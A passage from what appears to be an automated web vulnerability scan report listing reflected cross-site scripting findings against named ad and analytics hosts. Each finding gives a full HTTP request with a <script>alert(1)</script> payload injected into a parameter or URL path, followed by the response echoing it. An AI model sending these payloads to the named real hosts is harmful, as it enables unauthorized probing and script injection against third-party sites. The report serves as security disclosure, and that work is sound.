GET /viapi?action=pixel&id=7117492757be4b<a>cfdf0815b78 HTTP/1.1 Host: api.dimestore.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pixel_eb2039789=1; respondentId=aa84b8a80c474deb8a2607134fb0172a; respondentEmail=""; IgUsFjsrORc3NyILDBo6HychGw%3D%3D=EyADRWJEY0FpdVF%2BSWQ%3D; Mlo9CTINKhomHCQJNys5Fzc3Igs%3D=dkd8VQ%3D%3D; Mlo9CTINKhomHCQJNysrEzEh=""; IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkN2fF4%3D=dQ%3D%3D
Response
HTTP/1.1 200 OK Server: nginx/0.6.35 Date: Sat, 17 Sep 2011 01:06:42 GMT Content-Type: application/xml Connection: keep-alive Set-Cookie: pixel_7117492757be4b<a>cfdf0815b78=1; Expires=Sun, 16-Sep-2012 01:06:42 GMT Content-Length: 55
// DIMESTORE PIXEL OK -- 7117492757be4b<a>cfdf0815b78
4.64. http://ar.voicefive.com/b/rc.pli [func parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ar.voicefive.com
Path: /b/rc.pli
Issue detail
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8df99<script>alert(1)</script>8a03bb991cc was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction8df99<script>alert(1)</script>8a03bb991cc&n=ar_int_p63514475&1316238877286 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://omg.yahoo.com/xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316220781%2E709%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 00:55:06 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
COMSCORE.BMX.Broker.handleInteraction8df99<script>alert(1)</script>8a03bb991cc("");
4.65. http://b.scorecardresearch.com/beacon.js [c1 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://b.scorecardresearch.com
Path: /beacon.js
Issue detail
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 41452<script>alert(1)</script>b5bc8226dea was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=741452<script>alert(1)</script>b5bc8226dea&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:02 GMT Date: Sat, 17 Sep 2011 00:52:02 GMT Content-Length: 1235 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"741452<script>alert(1)</script>b5bc8226dea", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
4.66. http://b.scorecardresearch.com/beacon.js [c10 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://b.scorecardresearch.com
Path: /beacon.js
Issue detail
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 66a83<script>alert(1)</script>803fdeef77b was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=3005693&c3=17&c4=http%3A%2F%2Fwww.bradsdeals.com&c5=&c6=&c10=66a83<script>alert(1)</script>803fdeef77b&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 01:37:02 GMT Date: Sat, 17 Sep 2011 01:37:02 GMT Content-Length: 1261 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... ){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"17", c4:"http://www.bradsdeals.com", c5:"", c6:"", c10:"66a83<script>alert(1)</script>803fdeef77b", c15:"", c16:"", r:""});
4.67. http://b.scorecardresearch.com/beacon.js [c15 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://b.scorecardresearch.com
Path: /beacon.js
Issue detail
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 961ba<script>alert(1)</script>5ef4d07457b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=961ba<script>alert(1)</script>5ef4d07457b&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:09 GMT Date: Sat, 17 Sep 2011 00:52:09 GMT Content-Length: 1235 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... .length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"961ba<script>alert(1)</script>5ef4d07457b", c16:"", r:""});
4.68. http://b.scorecardresearch.com/beacon.js [c2 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://b.scorecardresearch.com
Path: /beacon.js
Issue detail
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 3d1ac<script>alert(1)</script>969635bd65a was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=59648883d1ac<script>alert(1)</script>969635bd65a&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:03 GMT Date: Sat, 17 Sep 2011 00:52:03 GMT Content-Length: 1235 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"59648883d1ac<script>alert(1)</script>969635bd65a", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
4.69. http://b.scorecardresearch.com/beacon.js [c3 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://b.scorecardresearch.com
Path: /beacon.js
Issue detail
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload dcffa<script>alert(1)</script>16a4cf57524 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2dcffa<script>alert(1)</script>16a4cf57524&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:05 GMT Date: Sat, 17 Sep 2011 00:52:05 GMT Content-Length: 1235 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2dcffa<script>alert(1)</script>16a4cf57524", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
4.70. http://b.scorecardresearch.com/beacon.js [c4 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://b.scorecardresearch.com
Path: /beacon.js
Issue detail
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d68d4<script>alert(1)</script>a87e6bee52c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=d68d4<script>alert(1)</script>a87e6bee52c&c5=&c6=&c15=&tm=738115 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
|
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sat, 01 Oct 2011 00:52:06 GMT Date: Sat, 17 Sep 2011 00:52:06 GMT Content-Length: 1235 Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... =[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"d68d4<script>alert(1)</script>a87e6bee52c", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
|
4.71. http://b.scorecardresearch.com/beacon.js [c5 parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b.scorecardresearch.com |
| Path: | /beacon.js |
Issue detail
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload e7599<script>alert(1)</script>52183d27ea7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=e7599<script>alert(1)</script>52183d27ea7&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:07 GMT
Date: Sat, 17 Sep 2011 00:52:07 GMT
Content-Length: 1235
Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... ;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"e7599<script>alert(1)</script>52183d27ea7", c6:"", c10:"", c15:"", c16:"", r:""});
4.72. http://b.scorecardresearch.com/beacon.js [c6 parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b.scorecardresearch.com |
| Path: | /beacon.js |
Issue detail
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 4342b<script>alert(1)</script>a0dd5801e26 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=4342b<script>alert(1)</script>a0dd5801e26&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:08 GMT
Date: Sat, 17 Sep 2011 00:52:08 GMT
Content-Length: 1235
Connection: close
if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi ...[SNIP]... comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"4342b<script>alert(1)</script>a0dd5801e26", c10:"", c15:"", c16:"", r:""});
4.73. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 2]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b3.mookie1.com |
| Path: | /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c73"><script>alert(1)</script>e1b769851e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATTf3c73"><script>alert(1)</script>e1b769851e7/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 380
Content-Type: text/html
<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATTf3c73"><script>alert(1)</script>e1b769851e7/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/2021264515/Bottom3/default/empty.gif/4d686437616b357a2b73594141673869?x" target="_top"> ...[SNIP]...
4.74. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 3]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b3.mookie1.com |
| Path: | /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 335ab"><script>alert(1)</script>facc901f053 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/LP335ab"><script>alert(1)</script>facc901f053/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 463
Content-Type: text/html
<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP335ab"><script>alert(1)</script>facc901f053/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/L9/1785929992/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b357a2b74514141672b75?x" target="_blank"> ...[SNIP]...
4.75. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 4]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b3.mookie1.com |
| Path: | /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 |
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32bc8"><script>alert(1)</script>895c80335e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new32bc8"><script>alert(1)</script>895c80335e5/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 463
Content-Type: text/html
<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new32bc8"><script>alert(1)</script>895c80335e5/1[timestamp]/L9/1578951643/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b357a2b754941424d6f62?x" target="_blank"> ...[SNIP]...
4.76. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 5]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b3.mookie1.com |
| Path: | /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 |
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71dff"><script>alert(1)</script>b41d32a101b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom371dff"><script>alert(1)</script>b41d32a101b? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:42:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 372
Content-Type: text/html
<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/1878794723/Bottom371dff"><script>alert(1)</script>b41d32a101b/default/empty.gif/4d686437616b357a2b764141426c786f?x" target="_top"> ...[SNIP]...
4.77. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bh.heraldinteractive.com |
| Path: | /includes/processAds.bg |
Issue detail
The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9bf9</script><script>alert(1)</script>cc94f26ced5 was submitted in the companion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottomb9bf9</script><script>alert(1)</script>cc94f26ced5&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:40 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2154
Connection: close
Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
